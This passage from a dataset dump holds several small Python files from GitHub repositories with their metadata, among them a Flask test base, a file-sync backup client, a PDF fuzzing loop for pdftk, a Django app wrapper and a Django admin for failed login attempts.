:"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import pprint\nimport unittest\n\nfrom flask import json\n\nfrom makershop import create_app\nfrom makershop.models import db\nfrom .factories import UserFactory\n\n\nclass MakershopTestCase(unittest.TestCase):\n def setUp(self):\n #db.create_all(app=create_app())\n self.app = create_app()\n self.app.debug = True\n #self.client = self.app.test_client()\n with self.app.test_request_context():\n db.drop_all()\n db.create_all()\n self.client = self.app.test_client()\n\n def tearDown(self):\n with self.app.test_request_context():\n db.drop_all()\n\n def assert_api_error(self, response, status_code, message):\n if response.status_code != status_code:\n raise AssertionError(\n \"HTTP Status: {actual} !== {expected}\".format(\n actual=response.status_code,\n expected=status_code,\n )\n )\n\n if json.loads(response.data) != {'message': message}:\n raise AssertionError(\n 'returned JSON:\\n\\nGot: {}\\n\\nExpected: {}'.format(\n response.data.decode('utf-8'),\n json.dumps({'message': message})\n )\n )\n\n\nclass UserLoggedIn(MakershopTestCase):\n def setUp(self):\n super().setUp()\n self.client = self.app.test_client()\n\n with self.app.test_request_context():\n self.user = UserFactory.create(password='foo')\n\n self.client.post(\n '/user/login/',\n data={\n 'username': self.user.email,\n 'password': 'foo',\n }\n )\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1187,"cells":{"__id__":{"kind":"number","value":4200478039695,"string":"4,200,478,039,695"},"blob_id":{"kind":"string","value":"989550166ca2d2f958d8c32743ab3da089fc5d1f"},"directory_id":{"kind":"string","value":"f4efd48507a830a0c1248393947ce5a74644bf28"},"path":{"kind":"string","value":"/scripts/train_test_split.py"},"content_id":{"kind":"string","value":"4771bd7788aee4613346cbe815966ea5ee66de7a"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"pschulam-attic/ulm"},"repo_url":{"kind":"string","value":"https://github.com/pschulam-attic/ulm"},"snapshot_id":{"kind":"string","value":"25bfdfa947be3dfe96a005b224a4bb6862be54de"},"revision_id":{"kind":"string","value":"9f77ab18de2c9a5f18cc7b8daa944e58ed8c1e45"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-06T17:19:47.952537","string":"2016-09-06T17:19:47.952537"},"revision_date":{"kind":"timestamp","value":"2013-05-09T17:21:39","string":"2013-05-09T17:21:39"},"committer_date":{"kind":"timestamp","value":"2013-05-09T17:21:39","string":"2013-05-09T17:21:39"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import argparse\nimport random\nimport sys\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', help='Percentage of data for training', type=float)\n parser.add_argument('--train', help='Write the training data to this file', default='train.txt')\n parser.add_argument('--test', help='Write the test data to this file', default='test.txt')\n parser.add_argument('--seed', help='Random seed (a string)', default='split')\n args = parser.parse_args()\n\n data = [l.strip() for l in sys.stdin if l.strip()]\n random.seed(args.seed)\n train_set = set(random.sample(xrange(len(data)), int(args.p * len(data))))\n\n with open(args.train, 'w') as train, open(args.test, 'w') as test:\n for i, d in enumerate(data):\n stream = train if i in train_set else test\n stream.write(d + '\\n')\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1188,"cells":{"__id__":{"kind":"number","value":12292196416134,"string":"12,292,196,416,134"},"blob_id":{"kind":"string","value":"f622e338359c699204218cd6a1ac9f5e330bed8c"},"directory_id":{"kind":"string","value":"5f3dccbac5179b500054add89744220591ce838f"},"path":{"kind":"string","value":"/client.py"},"content_id":{"kind":"string","value":"3b0bd8e2968bc86f97b664900e4a1ee3e70844fa"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"f-prime/IonicBackup"},"repo_url":{"kind":"string","value":"https://github.com/f-prime/IonicBackup"},"snapshot_id":{"kind":"string","value":"23cb1e49c45799a5a5c86a4216817f5dca1f51e5"},"revision_id":{"kind":"string","value":"17b467bfcfe41b959c1c0ace3d3d4627531ae2f4"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-05-27T16:28:35.642015","string":"2021-05-27T16:28:35.642015"},"revision_date":{"kind":"timestamp","value":"2013-04-05T00:40:13","string":"2013-04-05T00:40:13"},"committer_date":{"kind":"timestamp","value":"2013-04-05T00:40:13","string":"2013-04-05T00:40:13"},"github_id":{"kind":"number","value":8789289,"string":"8,789,289"},"star_events_count":{"kind":"number","value":4,"string":"4"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import socket, os, time, sys, thread, getpass, hashlib\n\nclass IonicClient:\n def __init__(self, ip, port, username, password):\n self.ip = ip\n self.port = port\n self.username = hashlib.sha256(username).hexdigest()\n self.password = hashlib.sha256(password).hexdigest()\n self.dirs = []\n self.files = {}\n for x,y,z in os.walk(os.getcwd()):\n for b in z:\n if b == sys.argv[0]:\n continue\n with open(x+\"/\"+b, 'rb') as file:\n self.files[b.strip(\"/\")] = hash(file.read())\n def main(self):\n while True:\n try:\n time.sleep(1)\n stuff = self.list().split(\":\")\n try:\n dir = eval(stuff[0])\n except SyntaxError:\n print \"\\nLogin Failed\"\n break\n file = eval(stuff[1])\n for x in dir:\n if not os.path.exists(x.strip(\"/\")):\n os.mkdir(x.strip(\"/\"))\n self.dirs.append(x)\n for x in file:\n if not os.path.exists(x) and x not in self.files:\n self.get(x)\n with open(x, 'rb') as f:\n self.files[x] = hash(f.read())\n if not os.path.exists(x) and x in self.files:\n self.delete(x)\n del self.files[x]\n for x,y,z in os.walk(os.getcwd()):\n for d in y:\n direc = x.strip(os.getcwd())+\"/\"+d\n direc = direc.strip(\"/\")\n if direc not in self.dirs:\n self.dirs.append(direc)\n if direc not in dir:\n self.senddir(direc)\n for f in z:\n file_c = x +\"/\"+ f\n file_c = file_c.replace(os.getcwd(), '').strip(\"/\")\n if file_c == sys.argv[0]:\n continue\n if file_c in self.files and file_c not in file:\n self.send(file_c)\n elif file_c not in self.files and file_c not in file:\n with open(file_c, 'rb') as f:\n self.files[file_c] = hash(f.read())\n self.send(file_c)\n elif file_c in self.files and file_c in file:\n with open(file_c, 'rb') as f:\n if hash(f.read()) != self.files[file_c]:\n self.send(file_c)\n with open(file_c, 'rb') as f:\n self.files[file_c] = hash(f.read())\n except Exception, error:\n print error\n print \"\\n Could not connect to server, trying again.\"\n time.sleep(1)\n def senddir(self, direc):\n senddir = socket.socket()\n try:\n senddir.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n send = \"senddir {0} {1} {2}\".format(direc, self.username, self.password)\n senddir.send(send)\n senddir.close()\n def list(self):\n list = socket.socket()\n try:\n list.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n send = \"list {0} {1}\".format(self.username, self.password)\n list.send(send)\n data = ''\n while True:\n d = list.recv(1024)\n data = data + d\n if not d:\n break\n return data\n list.close()\n def send(self, file):\n print \"sending\", file\n send = socket.socket()\n send.connect((self.ip, self.port))\n sends = \"send {0} {1} {2}\\r\\n\\r\\n\".format(file, self.username, self.password)\n send.send(sends)\n with open(file, 'rb') as file_:\n for x in file_.readlines():\n send.send(x)\n print \"Done sending\", file\n send.close()\n def get(self, file):\n print \"Downloading\", file\n get = socket.socket()\n try:\n get.connect((self.ip, self.port))\n except:\n print \"Could not connect to server\"\n send = \"get {0} {1} {2}\".format(file, self.username, self.password)\n get.send(send)\n with open(file, 'wb') as name:\n while True:\n data = get.recv(1024)\n if not data:\n print \"Done downloading\", file\n get.close()\n break\n name.write(data)\n def delete(self, file):\n if file == sys.argv[0]:\n print \"You can not delete Ionic Backup Client\"\n else:\n try:\n os.remove(file)\n except:\n print \"File doesn't exist\"\n\n delete = socket.socket()\n try:\n delete.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n send = \"del {0} {1} {2}\".format(file, self.username, self.password)\n delete.send(send)\n delete.close()\n def delete_dir(self, file):\n try:\n os.rmdir(file)\n except:\n print \"Directory doesn't exist\"\n deldir = socket.socket()\n try:\n deldir.connect((self.ip, self.port))\n except:\n print \"Could not connect to server.\"\n \n send = \"deldir {0} {1} {2}\".format(file, self.username, self.password)\n deldir.send(send)\n deldir.close()\n\ndef shell(ip, port, username, password):\n while True:\n cmd = raw_input(\"IonicShell> \")\n if cmd == \"help\":\n print \"\"\"\n\n rm - Deletes a file on the server and locally.\n rmdir - Deletes a directory on the server and locally.\n ls - Returns all the files on the server.\n\n \"\"\"\n elif cmd.startswith(\"rm \"):\n cmd = cmd.split()[1]\n IonicClient(ip, port, username, password).delete(cmd)\n\n elif cmd.startswith(\"rmdir \"):\n cmd = cmd.split()[1]\n IonicClient(ip, port, username, password).delete_dir(cmd)\n elif cmd == \"ls\":\n stuff = IonicClient(ip, port, username, password).list().split(\":\")\n print \"Directories: \\n\"+'\\n'.join(eval(stuff[0]))\n print \"\\n\"\n print \"Files: \\n\"+'\\n'.join(eval(stuff[1]))\n\nif __name__ == \"__main__\":\n try:\n ip = sys.argv[1]\n port = int(sys.argv[2])\n except IndexError:\n print \"Usage: python client.py \"\n else:\n username = raw_input(\"Username: \")\n password = getpass.getpass(\"Password: \")\n thread.start_new_thread(shell, (ip, port, username, password))\n IonicClient(ip, port, username, password).main()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1189,"cells":{"__id__":{"kind":"number","value":18528488934689,"string":"18,528,488,934,689"},"blob_id":{"kind":"string","value":"7a6929f42659f7250da041793911e80342ef94a9"},"directory_id":{"kind":"string","value":"975e70f89e54e91adc00f1028183011f6a9a37fd"},"path":{"kind":"string","value":"/Software Debugging/fuzzing.py"},"content_id":{"kind":"string","value":"5bae71e90f61335351740d89f3d47776f1bd18e9"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"marceldallagnol/short-programs"},"repo_url":{"kind":"string","value":"https://github.com/marceldallagnol/short-programs"},"snapshot_id":{"kind":"string","value":"953ca21a71a0a1ada6c85e05ad416c8049983a28"},"revision_id":{"kind":"string","value":"9a5fd1f1f92d4789e43c81b8953cb9770a08e1b5"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-05-27T23:03:32.965876","string":"2021-05-27T23:03:32.965876"},"revision_date":{"kind":"timestamp","value":"2012-09-15T23:42:28","string":"2012-09-15T23:42:28"},"committer_date":{"kind":"timestamp","value":"2012-09-15T23:42:28","string":"2012-09-15T23:42:28"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from subprocess import call\nfrom datetime import datetime\nfrom random import randrange\nfrom shutil import copy\n\nfor i in range(100000):\n test = list(open('front_base.pdf','rb').read())\n test[randrange(len(test))] = '%c' % randrange(256)\n test = ''.join(test)\n front = open('front.pdf', 'w')\n front.write(test)\n front.close()\n call('pdftk front.pdf background back.pdf output out.pdf'.split())\n copy('front.pdf', str(i) + '_' + str(datetime.now()))\n print i\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}},{"rowIdx":1190,"cells":{"__id__":{"kind":"number","value":18897856114293,"string":"18,897,856,114,293"},"blob_id":{"kind":"string","value":"c0cd10b877e2bca6ebb83dd21e6541375a29c55e"},"directory_id":{"kind":"string","value":"64369aee9ec21d0bcc59afb345069ad7168dada4"},"path":{"kind":"string","value":"/model/book.py"},"content_id":{"kind":"string","value":"ac2f9664688be6dd2a800f9883c0ec84610dd5fd"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"nair13/Molurus"},"repo_url":{"kind":"string","value":"https://github.com/nair13/Molurus"},"snapshot_id":{"kind":"string","value":"ab313f02dc21d68e98c0014ce5cc4c4a11981fed"},"revision_id":{"kind":"string","value":"5c71151b0e435f0caa34faacaf2e18c98e5ab831"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-10T20:24:48.633580","string":"2016-09-10T20:24:48.633580"},"revision_date":{"kind":"timestamp","value":"2014-07-02T14:57:21","string":"2014-07-02T14:57:21"},"committer_date":{"kind":"timestamp","value":"2014-07-02T14:57:21","string":"2014-07-02T14:57:21"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nimport fileops as op\n\ndef list_books(db,conf):\n book = \"%s_book\"%conf.db_pre\n books = db.select(book)\n return books\n\ndef add_book(db,conf,i):\n book = \"%s_book\"%conf.db_pre\n db.insert(book, book_title = i.book_title,\n book_author = i.book_author,\n book_category = i.book_category,\n book_count = i.book_count)\n\ndef issue_book(db,conf,i):\n transact = \"%s_transact\"%conf.db_pre\n cur = op.curr_date()\n db.insert(transact, book_id = id(i.book_id),\n user_id = i.user_id,\n issue_date = cur,\n return_date = cur,\n due_date = i.due_date)"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1191,"cells":{"__id__":{"kind":"number","value":4629974758612,"string":"4,629,974,758,612"},"blob_id":{"kind":"string","value":"46ec9067d736d46b27c6db1398f5ff3238a42fc6"},"directory_id":{"kind":"string","value":"6bf31679387a3cbd40cde69aa63dd685a9f03662"},"path":{"kind":"string","value":"/dirt/django.py"},"content_id":{"kind":"string","value":"db5f742c93a2eb5760a118a5e7e5b34db25789b3"},"detected_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"joelcrocker/dirt"},"repo_url":{"kind":"string","value":"https://github.com/joelcrocker/dirt"},"snapshot_id":{"kind":"string","value":"bc7d409b2f88c4f57dee9f498e0d2b2c29a0cddc"},"revision_id":{"kind":"string","value":"70150add2b58f5040e242ad97d052910b6a66646"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-16T21:01:57.283605","string":"2021-01-16T21:01:57.283605"},"revision_date":{"kind":"timestamp","value":"2013-02-05T00:38:04","string":"2013-02-05T00:38:04"},"committer_date":{"kind":"timestamp","value":"2013-02-05T00:38:04","string":"2013-02-05T00:38:04"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from __future__ import absolute_import\n\nimport logging\n\nfrom django.core.handlers.wsgi import WSGIHandler as DjangoWSGIApp\nfrom django.conf import settings\nfrom gevent.wsgi import WSGIServer\nimport gevent\n\nfrom .app import DirtApp\n\n\nclass DjangoApp(DirtApp):\n log = logging.getLogger(__name__)\n\n def setup(self):\n self.application = DjangoWSGIApp()\n if self.settings.DEBUG:\n from werkzeug import DebuggedApplication\n self.application = DebuggedApplication(self.application, evalex=True)\n settings.get_api = self.settings.get_api\n self.server = WSGIServer(self.settings.http_bind, self.application, log=None)\n\n def serve_dirt_rpc(self):\n \"\"\" Calls ``DirtApp.serve`` to start the RPC server, which lets callers\n use the debug API. \"\"\"\n if getattr(self.settings, \"bind_url\", None) is None:\n self.log.info(\"no `bind_url` specified; RPC server not starting.\")\n return\n DirtApp.serve(self)\n\n def serve(self):\n self.api_thread = gevent.spawn(self.serve_dirt_rpc)\n self.log.info(\"Starting server on http://%s:%s...\", *self.settings.http_bind)\n self.server.serve_forever()\n\n def get_api(self, *args, **kwargs):\n \"\"\" The DjangoApp returns an empty API object by default so that tab\n completion of the API will work. Feel free to override this method.\n \"\"\"\n return object()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1192,"cells":{"__id__":{"kind":"number","value":10660108851044,"string":"10,660,108,851,044"},"blob_id":{"kind":"string","value":"1e14f9b23cf4016cc3ef224f114a60ac918cf69c"},"directory_id":{"kind":"string","value":"98096fce6b6e05d10b3fc3c979afafe8d6aa54f5"},"path":{"kind":"string","value":"/cerberos/admin.py"},"content_id":{"kind":"string","value":"f6e427d21273e0dbc236037a41768914d084deef"},"detected_licenses":{"kind":"list like","value":["BSD-3-Clause"],"string":"[\n \"BSD-3-Clause\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"AdrianRibao/cerberos"},"repo_url":{"kind":"string","value":"https://github.com/AdrianRibao/cerberos"},"snapshot_id":{"kind":"string","value":"eec4b15f897fbc349dd22db1ca404a089dc35426"},"revision_id":{"kind":"string","value":"25c1878ca14a1d1ac90315029e74c6e2f9cf8bd6"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-25T08:42:43.147364","string":"2021-01-25T08:42:43.147364"},"revision_date":{"kind":"timestamp","value":"2014-06-04T12:20:49","string":"2014-06-04T12:20:49"},"committer_date":{"kind":"timestamp","value":"2014-06-04T12:21:24","string":"2014-06-04T12:21:24"},"github_id":{"kind":"number","value":6059635,"string":"6,059,635"},"star_events_count":{"kind":"number","value":1,"string":"1"},"fork_events_count":{"kind":"number","value":1,"string":"1"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"bool","value":false,"string":"false"},"gha_event_created_at":{"kind":"timestamp","value":"2013-01-11T10:27:50","string":"2013-01-11T10:27:50"},"gha_created_at":{"kind":"timestamp","value":"2012-10-03T12:20:41","string":"2012-10-03T12:20:41"},"gha_updated_at":{"kind":"timestamp","value":"2013-01-10T12:30:04","string":"2013-01-10T12:30:04"},"gha_pushed_at":{"kind":"timestamp","value":"2013-01-10T12:30:03","string":"2013-01-10T12:30:03"},"gha_size":{"kind":"number","value":160,"string":"160"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"number","value":1,"string":"1"},"gha_open_issues_count":{"kind":"number","value":2,"string":"2"},"gha_language":{"kind":"string","value":"Python"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom cerberos.models import FailedAccessAttempt\nfrom django.utils.translation import ugettext as _ \n\nclass FailedAccessAttemptAdmin(admin.ModelAdmin):\n date_hierarchy = 'created'\n list_display = [\n 'ip_address',\n 'username',\n 'locked',\n 'expired',\n 'user_agent',\n 'failed_logins',\n 'get_time_to_forget_text',\n 'site',\n ]\n list_filter = [\n 'locked',\n 'expired',\n 'site',\n ]\n search_fields = [\n 'ip_address',\n 'username',\n 'user_agent',\n ]\n fieldsets = (\n ('Main data', {\n 'fields': ('site', 'ip_address', 'username', 'locked', 'expired', 'failed_logins', )\n }),\n ('Data recollected', {\n #'classes': ('collapse',),\n 'fields': ('user_agent', 'get_data', 'post_data', 'http_accept', 'path_info',)\n }),\n )\n actions = ['lock', 'unlock']\n\n def lock(self, request, queryset):\n queryset.update(locked=True)\n lock.short_description = _(u'Lock the users')\n\n def unlock(self, request, queryset):\n queryset.update(locked=False)\n unlock.short_description = _(u'Unlock the users')\n\nadmin.site.register(FailedAccessAttempt, FailedAccessAttemptAdmin)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1193,"cells":{"__id__":{"kind":"number","value":14336600864901,"string":"14,336,600,864,901"},"blob_id":{"kind":"string","value":"8f988c53d4bdb3a51de19673f5a74305d4df3c15"},"directory_id":{"kind":"string","value":"d115cf7a1b374d857f6b094d4b4ccd8e9b1ac189"},"path":{"kind":"string","value":"/tags/pyplusplus_dev_1.0.0/unittests/transfer_ownership_old_tester.py"},"content_id":{"kind":"string","value":"7883a27035a915920e279dfbf359e28931357e53"},"detected_licenses":{"kind":"list like","value":["BSL-1.0"],"string":"[\n \"BSL-1.0\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"gatoatigrado/pyplusplusclone"},"repo_url":{"kind":"string","value":"https://github.com/gatoatigrado/pyplusplusclone"},"snapshot_id":{"kind":"string","value":"30af9065fb6ac3dcce527c79ed5151aade6a742f"},"revision_id":{"kind":"string","value":"a64dc9aeeb718b2f30bd6a5ff8dcd8bfb1cd2ede"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-05T23:32:08.595261","string":"2016-09-05T23:32:08.595261"},"revision_date":{"kind":"timestamp","value":"2010-05-16T10:53:45","string":"2010-05-16T10:53:45"},"committer_date":{"kind":"timestamp","value":"2010-05-16T10:53:45","string":"2010-05-16T10:53:45"},"github_id":{"kind":"number","value":700369,"string":"700,369"},"star_events_count":{"kind":"number","value":4,"string":"4"},"fork_events_count":{"kind":"number","value":2,"string":"2"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# Copyright 2004-2008 Roman Yakovenko.\r\n# Distributed under the Boost Software License, Version 1.0. (See\r\n# accompanying file LICENSE_1_0.txt or copy at\r\n# http://www.boost.org/LICENSE_1_0.txt)\r\n\r\nimport os\r\nimport sys\r\nimport unittest\r\nimport fundamental_tester_base\r\nfrom pyplusplus import code_creators\r\nfrom pyplusplus.module_builder import call_policies\r\nfrom pyplusplus import function_transformers as ft\r\n\r\n\r\nimpl_conv_code = \\\r\n\"\"\"\r\nboost::python::implicitly_convertible< std::auto_ptr< %(from)s >, std::auto_ptr< %(to)s > >();\r\n\"\"\"\r\n\r\nregister_sptr = \\\r\n\"\"\"\r\nboost::python::register_ptr_to_python< %s >();\r\n\"\"\"\r\n\r\nclass tester_t(fundamental_tester_base.fundamental_tester_base_t):\r\n EXTENSION_NAME = 'transfer_ownership_old'\r\n \r\n def __init__( self, *args ):\r\n fundamental_tester_base.fundamental_tester_base_t.__init__( \r\n self\r\n , tester_t.EXTENSION_NAME\r\n , *args )\r\n\r\n def customize( self, mb ):\r\n event_clss = mb.classes( lambda cls: cls.name in ( 'event_t', 'do_nothing_t' ) )\r\n for cls in event_clss:\r\n cls.exposed_class_type = cls.EXPOSED_CLASS_TYPE.WRAPPER \r\n cls.held_type = 'std::auto_ptr< %s >' % cls.wrapper_alias\r\n cls.add_registration_code( register_sptr % 'std::auto_ptr< %s >' % cls.decl_string, False )\r\n cls.add_registration_code( impl_conv_code % { 'from' : cls.wrapper_alias\r\n , 'to' : cls.decl_string }\r\n , False)\r\n for base in cls.recursive_bases:\r\n if base.access_type == 'public':\r\n cls.add_registration_code( #from class to its base\r\n impl_conv_code % { 'from' : cls.decl_string\r\n , 'to' : base.related_class.decl_string }\r\n , False)\r\n \r\n cls.add_registration_code( #from wrapper to clas base class\r\n impl_conv_code % { 'from' : cls.wrapper_alias\r\n , 'to' : base.related_class.decl_string }\r\n , False)\r\n\r\n simulator = mb.class_( 'simulator_t' )\r\n simulator.mem_fun( 'get_event' ).call_policies \\\r\n = call_policies.return_internal_reference()\r\n schedule = mb.mem_fun( 'schedule' )\r\n schedule.add_transformation( ft.transfer_ownership(0), alias='schedule' )\r\n \r\n def run_tests( self, module):\r\n class py_event_t( module.event_t ):\r\n def __init__( self, container ):\r\n module.event_t.__init__( self )\r\n self.container = container\r\n \r\n def notify( self ):\r\n print 'notify'\r\n self.container.append( 1 )\r\n print '1 was append'\r\n \r\n print 'test started'\r\n notify_data = []\r\n simulator = module.simulator_t()\r\n print 'simulator created'\r\n event = py_event_t( notify_data )\r\n print 'py_event_t created: ', id( event )\r\n simulator.schedule( event ) \r\n print 'event was shceduled'\r\n print 'event refcount: ', sys.getrefcount( event )\r\n print 'simulator refcount: ', sys.getrefcount( simulator )\r\n #~ del event\r\n print 'event was deleted'\r\n event = simulator.get_event()\r\n print 'event was restored via saved reference in simulator: ', id( event )\r\n print 'event refcount: ', sys.getrefcount( simulator.get_event() )\r\n print 'call event.notify(): ', simulator.get_event().notify()\r\n print 'call simulator.run()'\r\n simulator.run()\r\n self.failUnless( notify_data[0] == 1 )\r\n \r\ndef create_suite():\r\n suite = unittest.TestSuite() \r\n suite.addTest( unittest.makeSuite(tester_t))\r\n return suite\r\n\r\ndef run_suite():\r\n unittest.TextTestRunner(verbosity=2).run( create_suite() )\r\n\r\nif __name__ == \"__main__\":\r\n run_suite()\r\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2010,"string":"2,010"}}},{"rowIdx":1194,"cells":{"__id__":{"kind":"number","value":15350213132505,"string":"15,350,213,132,505"},"blob_id":{"kind":"string","value":"bd3f846a51bf1c46eaec913cd7ebc30ca017236a"},"directory_id":{"kind":"string","value":"66fcdc7a97ad8979c8fddddf8a7d5ce0727bc486"},"path":{"kind":"string","value":"/src/test.py"},"content_id":{"kind":"string","value":"72bb5b157e814a3f3f6edaaa238ec4342b54c030"},"detected_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 